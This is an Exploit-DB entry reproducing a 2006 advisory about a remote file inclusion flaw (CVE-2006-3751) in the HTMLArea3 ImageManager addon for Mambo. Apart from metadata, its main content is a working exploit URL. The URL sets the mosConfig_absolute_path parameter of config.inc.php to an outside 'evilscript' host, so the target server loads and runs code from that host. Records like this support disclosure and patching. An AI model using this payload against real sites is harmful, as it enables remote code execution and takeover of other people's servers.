HTMLArea3 Mambo Module <= 1.5 - Remote Include Vulnerability

2006-07-17T00:00:00
ID EDB-ID:2027
Type exploitdb
Reporter Matdhule
Modified 2006-07-17T00:00:00

Description

HTMLArea3 Mambo Module <= 1.5 Remote Include Vulnerability. CVE-2006-3751. Webapps exploit for php platform

                                        
                                            # HTMLArea3 addon - ImageManager

Author          : Ahmad Maulana a.k.a Matdhule
Date            : July 12th 2006
Location        : Indonesia, Jakarta
Web             : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
------------------------------------------------------------------------ 

Application    : HTMLArea3 addon - ImageManager
Version        : 1.5
URL        : 

Exploit:
http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://evilscript 

# milw0rm.com [2006-07-17]